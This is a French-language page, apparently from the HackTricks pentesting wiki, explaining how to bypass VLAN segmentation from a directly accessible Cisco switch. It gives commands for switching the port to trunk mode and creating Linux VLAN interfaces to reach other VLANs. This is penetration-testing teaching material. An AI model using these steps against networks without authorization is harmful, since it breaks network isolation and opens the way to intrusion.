hacktricks/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md

5 KiB

Lateral VLAN Segmentation Bypass

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Si un accès direct à un switch est disponible, la segmentation VLAN peut être contournée. Cela implique de reconfigurer le port connecté en mode trunk, d'établir des interfaces virtuelles pour les VLAN cibles et de définir des adresses IP, soit dynamiquement (DHCP), soit statiquement, selon le scénario (pour plus de détails, consultez https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).

Dans un premier temps, l'identification du port connecté spécifique est requise. Cela peut généralement être accompli par le biais de messages CDP, ou en recherchant le port via le masque include.

Si CDP n'est pas opérationnel, l'identification du port peut être tentée en recherchant l'adresse MAC :

SW1(config)# show mac address-table | include 0050.0000.0500

Avant de passer en mode trunk, une liste des VLAN existants doit être compilée et leurs identifiants déterminés. Ces identifiants sont ensuite assignés à l'interface, permettant l'accès à divers VLAN via le trunk. Le port utilisé, par exemple, est associé au VLAN 10.

SW1# show vlan brief

La transition vers le mode trunk implique d'entrer en mode de configuration de l'interface:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

Le passage en mode trunk perturbera temporairement la connectivité, mais cela peut être rétabli par la suite.

Des interfaces virtuelles sont ensuite créées, des ID VLAN leur sont attribués et elles sont activées :

sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

Ensuite, une demande d'adresse est faite via DHCP. Alternativement, dans les cas où DHCP n'est pas viable, les adresses peuvent être configurées manuellement :

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Exemple pour définir manuellement une adresse IP statique sur une interface (VLAN 10) :

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

La connectivité est testée en initiant des requêtes ICMP vers les passerelles par défaut pour les VLANs 10, 20, 50 et 60.

En fin de compte, ce processus permet de contourner la segmentation VLAN, facilitant ainsi un accès illimité à tout réseau VLAN et préparant le terrain pour des actions ultérieures.

Références

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}